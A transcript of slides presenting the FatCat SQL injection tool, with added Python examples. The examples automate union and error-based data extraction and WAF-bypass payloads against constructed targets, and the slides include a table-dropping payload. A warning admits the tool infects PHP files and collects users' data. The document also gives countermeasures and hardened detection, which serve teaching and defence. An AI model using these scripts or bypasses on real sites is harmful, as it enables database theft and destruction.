Fatcat Automatic Web SQL Injector by Sandeep Kamble

Posted on 05-Dec-2014


description

What is the FatCat SQL injector? FatCat is an automatic SQL injection tool. Its purpose is to test your web application and to exploit it deeper. FatCat supports MySQL 5.0. FatCat features: union-based SQL injection, error-based SQL injection, ModSecurity (WAF) bypass.

transcript

FatCat V2 – Automatic Web [S]QL-Injector

Sandeep Kamble AKA [S]Parason INC

Blog : http://sandeepkamble.com Twitter: @SandeepL337

# /usr/bin/whoami

•Narcissistic Vulnerability Pimp (aka security researcher for fun)

•Listed on the Google, Facebook, Twitter, Dropbox, Cloudflare, 500px, Lynda.com and Central Desktop security pages.

•Ahhh? What are those vulnerabilities?

•Member of Garage4hackers.com; you can find the POCs @G4h.

Index

•Introducing FatCat Beta 2
•SQL Injection in Brief
•FatCat Ingredients
  1) DB information & server information gathering.
  2) Normal SQL injection.
  3) Error-based SQL injection.
  4) WAF (Web Application Firewall) bypass functions.
     • C-style MySQL comment WAF bypass
     • Buffer overflow WAF bypass
     • CRLF WAF bypass
     • Bypass with information_schema.statistics
     • Bypass with information_schema.key_column_usage
  5) Countermeasures
  6) Demo

Provide Good Advice for Good People

Warning!: FatCat is used for security research. All PHP files will be infected and all your data will be collected. If you want to be safe, don't use this tool. If you do, don't send sensitive information. If after all that you still continue, do it at your own risk.

Ladies and gentlemen, introducing FatCat V2

1) It's new, it's cool to use, inject the web!
2) Normal SQL injection
3) Error-based SQL injection
4) WAF (web application firewall) bypass functions
5) Helpful to pentesters: you can create a POC from anywhere
6) It supports MySQL 5.0
7) Developed in PHP
8) FatCat has 3400+ downloads on code.google.com

SQL injection in Brief

"SQL injection happens when a user manipulates input and forms a SQL query."

Sending payload !@#$%^&*()

It's me .. Hi, :/ Payload: ; DROP TABLE Clubhackparty -- -

FatCat Ingredients

1) DB information & server information gathering.
2) Normal SQL injection.
3) Error-based SQL injection.
4) WAF (Web Application Firewall) bypass functions.

1) DB information & server information gathering

By using MySQL statements, DB and server information can be gathered:

1. Finding the total column count: ORDER BY n, increasing n until the query errors; the last n that works is the column count (the slide writes this as "order by n+1").
2. Finding the MySQL version: VERSION() function
3. Finding the current user: USER() function
4. Finding the data directory: @@datadir system variable
5. Finding the base directory: @@basedir system variable
6. Finding the host name: @@hostname system variable
7. Finding the operating system: @@version_compile_os system variable
8. Finding the current database name: DATABASE() function
9. Max allowed packet size: @@max_allowed_packet system variable

Note: the @@ names are MySQL system variables, not functions; they are read with SELECT @@name, and they are selected into the visible column of the union payload from the next step.

2) Normal SQL injection

•It is also known as union-based SQL injection
•UNION lets us combine the result sets of two SELECT statements; the injected SELECT must return the same number of columns as the original query, which is why the column count is found first
•E.g.: id=-2+UNION+SELECT+13371,13372,13373,13374-- -
•The id -2 matches no real row, so the page renders only the injected row; whichever marker values (13371, 13372, ...) appear in the page tell you which columns are visible and can carry VERSION(), USER(), @@datadir and so on
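The information-gathering steps and the union payload above, run end to end as an added example (this is not FatCat's code). The target is a constructed, in-memory SQLite application that concatenates the id parameter into its query; SQLite stands in for MySQL so that the example runs offline, which is why the version probe is sqlite_version() rather than VERSION() and the @@ variables are only mentioned in a comment. The marker values 13371..., the -2 id and the "-- -" comment are the slide's own; wrapping the probed value in ~ delimiters so it can be cut out of the HTML is this example's choice, mirroring the ~ markers in the double-query error shown on a later slide.

```python
import re
import sqlite3


# Constructed stand-in for a vulnerable target (not FatCat's code): an
# in-memory SQLite database behind a page handler that concatenates the
# `id` parameter into its query. SQLite keeps the example offline; the
# injection flow is the one used against MySQL.
def make_target():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, vendor TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99, 'acme');
        INSERT INTO products VALUES (2, 'gadget', 19.99, 'acme');
    """)

    def page(id_param):
        sql = "SELECT id, name, price, vendor FROM products WHERE id=" + id_param
        try:
            rows = conn.execute(sql).fetchall()
        except sqlite3.OperationalError as e:
            return "DB error: " + str(e)          # verbose error page
        # Only name and price are rendered; id and vendor never reach the HTML.
        return "\n".join(f"{name} ({price})" for _, name, price, _ in rows)

    return page


MARK_BASE = 13371   # marker values from the slide's payload: 13371, 13372, ...


def column_count(page, max_cols=32):
    """ORDER BY n for n = 1, 2, ... until the DB errors; the last good n is the count."""
    for n in range(1, max_cols + 1):
        if page(f"1 ORDER BY {n}-- -").startswith("DB error"):
            return n - 1
    return None


def union_payload(ncols, probes=None):
    """`-2 UNION SELECT m1,m2,...-- -`, with optional expressions in place of markers."""
    probes = probes or {}
    cols = [probes.get(i, str(MARK_BASE + i)) for i in range(ncols)]
    return "-2 UNION SELECT " + ",".join(cols) + "-- -"


def visible_columns(page, ncols):
    """Indexes of the union columns whose marker is reflected in the page body."""
    body = page(union_payload(ncols))
    return [i for i in range(ncols) if str(MARK_BASE + i) in body]


def read_expression(page, ncols, col, expr):
    """Evaluate expr server-side through a visible column, delimited with ~ so it
    can be cut out of the surrounding HTML (MySQL would use concat(0x7e,expr,0x7e))."""
    body = page(union_payload(ncols, {col: f"'~'||({expr})||'~'"}))
    m = re.search(r"~(.*?)~", body)
    return m.group(1) if m else None


def fingerprint(page):
    """Column count, visible columns and the DB version, i.e. steps 1-2 of the slide."""
    ncols = column_count(page)
    vis = visible_columns(page, ncols)
    # Against MySQL the probes would be VERSION(), USER(), DATABASE(), @@datadir,
    # @@hostname ...; SQLite only exposes sqlite_version(), so that is used here.
    version = read_expression(page, ncols, vis[0], "sqlite_version()")
    return {"columns": ncols, "visible": vis, "version": version}


if __name__ == "__main__":
    print(fingerprint(make_target()))
```

Running it prints four columns, visible columns [1, 2] (name and price), and the engine version read back through the name column; swapping the probe expression is all it takes to pull the other items from the list above.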


3) Error-based SQL injection

•It is also known as double-query SQL injection
•Sometimes union-based SQLi fails (no column is reflected in the page); then you can use error-based SQLi
•A query that confuses the DB engine and produces helpful MySQL errors: the value you want is carried inside the error text (a duplicate-key error, as on the next slide)
•E.g.: select gmailid,(select password from id where id=9) as Google_India from id;


FatCat web interface

Sending payload !@#$W00T%^&*()

Aww..! Double query:

Duplicate entry '~Clubhack_screte~1' for key 1
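The double-query trick as an added example, not FatCat's code: build the classic MySQL payload whose GROUP BY over a RAND(0) key raises a duplicate-key error carrying the wanted value, parse that error text (the slide's "Duplicate entry '~Clubhack_screte~1' for key 1" form), and page through long values, since MySQL truncates the key shown in the error. No MySQL is involved: fake_oracle is a constructed stand-in that answers each payload with the error MySQL would return for a given secret. The payload shape, information_schema.tables as the row source and the 32-character chunk size are assumptions of this example.

```python
import re


def double_query_payload(inner_select, offset=1, length=32):
    """Classic MySQL double-query payload (assumed shape, not FatCat's own):
    GROUP BY over CONCAT(secret, FLOOR(RAND(0)*2)) collides on the second row,
    and the duplicate-key error quotes the group key, secret included."""
    expr = f"MID(({inner_select}),{offset},{length})"
    return ("AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,"
            f"{expr},0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables "
            "GROUP BY x)a)")


# Matches both MySQL's "for key 'group_key'" and the slide's "for key 1".
DUP_ENTRY = re.compile(r"Duplicate entry '~(.*?)~[01]' for key", re.I)


def extract_from_error(error_text):
    """Pull the value out of the error page; None means no usable error."""
    m = DUP_ENTRY.search(error_text)
    return m.group(1) if m else None


def dump_via_errors(oracle, inner_select, chunk=32, max_len=4096):
    """Read a value chunk by chunk. MySQL truncates the key text in the
    duplicate-entry message at 64 bytes, so a long value needs several shots."""
    out = ""
    offset = 1
    while offset <= max_len:
        piece = extract_from_error(oracle(double_query_payload(inner_select, offset, chunk)))
        if piece is None:
            break                      # no error: blocked, no rows, or wrong syntax
        out += piece
        if len(piece) < chunk:
            break                      # MID() ran off the end of the value
        offset += chunk
    return out


def fake_oracle(secret):
    """Constructed stand-in for the target: reads the MID() offset/length out
    of the payload and answers with the error text MySQL would produce."""
    def respond(payload):
        m = re.search(r"MID\(\(.*?\),(\d+),(\d+)\)", payload)
        off, ln = int(m.group(1)), int(m.group(2))
        piece = secret[off - 1: off - 1 + ln]
        return f"Duplicate entry '~{piece}~1' for key 'group_key'"
    return respond


if __name__ == "__main__":
    # Constructed secret, taken from the slide's screenshot.
    oracle = fake_oracle("Clubhack_screte")
    print(dump_via_errors(oracle, "SELECT password FROM id WHERE id=9"))
```

Against a real target, oracle is the function that sends the payload in the vulnerable parameter and returns the response body; everything else stays the same.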

4) WAF (Web Application Firewall) bypass

What does a WAF do?
1. Protection against the OWASP Top Ten.
2. It can prevent a range of vulnerability types.
3. Brute-force protection.

In simple language, it monitors the HTTP conversation.

•We use the following methods to bypass a WAF:
• C-style MySQL comment WAF bypass
• Buffer overflow WAF bypass
• CRLF WAF bypass
• Bypass with information_schema.statistics
• Bypass with information_schema.key_column_usage

•Linux-based WAFs (as listed on the slide):
• AppArmor
• ModSecurity - also works under Mac OS X, Solaris and other versions of Unix.
• Systrace
• Zorp

(Strictly, only ModSecurity in that list is a web application firewall; AppArmor and Systrace are host-level sandboxing and Zorp is an application-level proxy firewall.)

1. MySQL comment WAF bypass
• Syntax: /*! MySQL statement */ (MySQL executes the text inside a /*! ... */ comment, while a filter that treats it as an ordinary comment skips it)
• Example: (screenshot on the slide)

2. Buffer overflow WAF bypass
• Syntax: ' AAAAAAAAAAAAAAAAAAAAAAAAAAAA MySQL statement (enough filler in front of the statement that a WAF which only inspects the first part of a request never reaches it)
• Example: (screenshot on the slide)

3. CRLF WAF bypass
• Syntax: %0A%0D+MySQL statements+%0A%0 (line breaks are whitespace to MySQL, but not to a signature written with literal spaces)
• Example: (screenshot on the slide)

4. Bypass with information_schema.key_column_usage
• Example: (screenshot on the slide)

5. Bypass with information_schema.statistics (the slide spells it "statics"; the table is information_schema.STATISTICS, and it lists only indexed columns)
• Example: (screenshot on the slide)
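The five bypasses as string rewrites applied to the slide's payloads and checked against a toy signature WAF, as an added example (not FatCat's code and not ModSecurity's rule set). The toy WAF has the two weaknesses the bypasses exploit: patterns written with literal spaces and an inspection window covering only the first bytes of a parameter. The second half shows the normalisation a detection engineer would add so the same rules catch every variant. Assumptions of this example: the filler for the buffer overflow bypass is placed inside a plain /* */ comment so the statement still parses (the slide shows bare "AAAA"), and the information_schema enumeration payload that the statistics / key_column_usage substitutions are applied to is constructed here.

```python
import re

# Toy signature WAF (constructed for this example): literal-space keyword
# patterns applied only to the first INSPECT_BYTES of a parameter value.
INSPECT_BYTES = 256
NAIVE_RULES = {
    "union_select": re.compile(r"union +select", re.I),
    "schema_columns": re.compile(r"information_schema\.columns", re.I),
}


def naive_hits(value):
    """Names of the naive rules that fire on the inspected window."""
    window = value[:INSPECT_BYTES]
    return [n for n, rx in NAIVE_RULES.items() if rx.search(window)]


# ---- the bypasses from the slides, as rewrites of a decoded payload ----
KEYWORDS = r"\b(UNION|SELECT|FROM|WHERE)\b"


def c_comment(payload):
    """/*!SELECT*/ form: MySQL runs the text inside /*! ... */, so a rule
    expecting `union<space>select` never sees the two words side by side."""
    return re.sub(KEYWORDS, r"/*!\1*/", payload, flags=re.I)


def padded(payload, size=1024):
    """Push the statement past the inspection window. The filler sits in a
    plain comment so MySQL ignores it (an assumption; the slide shows bare A's)."""
    return "/*" + "A" * size + "*/ " + payload


def crlf(payload):
    """%0A%0D form: LF/CR are whitespace to MySQL but not to a literal-space rule."""
    return payload.replace(" ", "\n\r")


def via_statistics(payload):
    """information_schema.statistics also carries table_name/column_name,
    but only for indexed columns, so the dump is partial."""
    return re.sub(r"information_schema\.columns", "information_schema.statistics",
                  payload, flags=re.I)


def via_key_column_usage(payload):
    """information_schema.key_column_usage: columns that take part in a key."""
    return re.sub(r"information_schema\.columns", "information_schema.key_column_usage",
                  payload, flags=re.I)


P_UNION = "-2 UNION SELECT 13371,13372,13373,13374-- -"          # from the slide
P_SCHEMA = ("-2 UNION SELECT 13371,column_name,13373,13374 FROM "  # constructed
            "information_schema.columns WHERE table_name='users'-- -")


def variants():
    return {
        "plain": P_UNION,
        "c_comment": c_comment(P_UNION),
        "padded": padded(P_UNION),
        "crlf": crlf(P_UNION),
        "statistics+comment": via_statistics(c_comment(P_SCHEMA)),
        "kcu+comment": via_key_column_usage(c_comment(P_SCHEMA)),
    }


# ---- what the detection side should do instead ----
def normalise(value):
    """Unwrap comments, collapse every whitespace run, inspect the whole value."""
    v = re.sub(r"/\*!?(.*?)\*/", r" \1 ", value, flags=re.S)
    return re.sub(r"\s+", " ", v)


HARDENED_RULES = {
    "union_select": re.compile(r"union\s+select", re.I),
    "schema_enum": re.compile(r"information_schema\.(columns|statistics|key_column_usage)", re.I),
}


def hardened_hits(value):
    v = normalise(value)
    return [n for n, rx in HARDENED_RULES.items() if rx.search(v)]


def report():
    """variant name -> (naive rules that fired, hardened rules that fired)."""
    return {name: (naive_hits(p), hardened_hits(p)) for name, p in variants().items()}


if __name__ == "__main__":
    for name, (naive, hardened) in report().items():
        print(f"{name:20s} naive={naive} hardened={hardened}")
```

Every transformed variant comes back with an empty naive list and a non-empty hardened one: the bypasses defeat the signatures, not the attack, and a rule set that normalises before matching and inspects the whole value closes all five.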

Countermeasures for SQLI
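For the countermeasures section, an added example (not from the slides) of the fix that removes the bug FatCat relies on: the same lookup written with string concatenation and with a bound parameter, against a constructed SQLite database. The slide's "-2 UNION SELECT" payload pulls a row from another table through the first version and is just a non-matching value to the second, because a bound parameter is sent to the engine as data and is never parsed as SQL.

```python
import sqlite3


def make_db():
    """Constructed sample database: a products table and a users table to leak."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'widget');
        CREATE TABLE users(id INTEGER, password TEXT);
        INSERT INTO users VALUES (1, 'Clubhack_screte');
    """)
    return conn


def lookup_unsafe(conn, id_param):
    """The bug: the request parameter is pasted into the statement text."""
    return conn.execute("SELECT name FROM products WHERE id=" + id_param).fetchall()


def lookup_safe(conn, id_param):
    """The fix: a placeholder plus a bound value. The statement text is fixed,
    so whatever the parameter contains can only ever be compared with id."""
    return conn.execute("SELECT name FROM products WHERE id=?", (id_param,)).fetchall()


PAYLOAD = "-2 UNION SELECT password FROM users-- -"   # the slide's union trick


def demo():
    """(rows the unsafe lookup returns for the payload, rows the safe one returns)."""
    conn = make_db()
    return lookup_unsafe(conn, PAYLOAD), lookup_safe(conn, PAYLOAD)


if __name__ == "__main__":
    leaked, safe = demo()
    print("unsafe:", leaked)   # the password row from the other table
    print("safe:  ", safe)     # nothing: the payload is not an id
```

Type-checking the parameter before the query (an integer id should be rejected if it is not one) is still worth doing, but it is a second layer; the binding alone is what makes the injection impossible.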

Let's inject with FatCat

A Gentleman never asks.

A Lady never tells.

Any Questions ?


Thank you !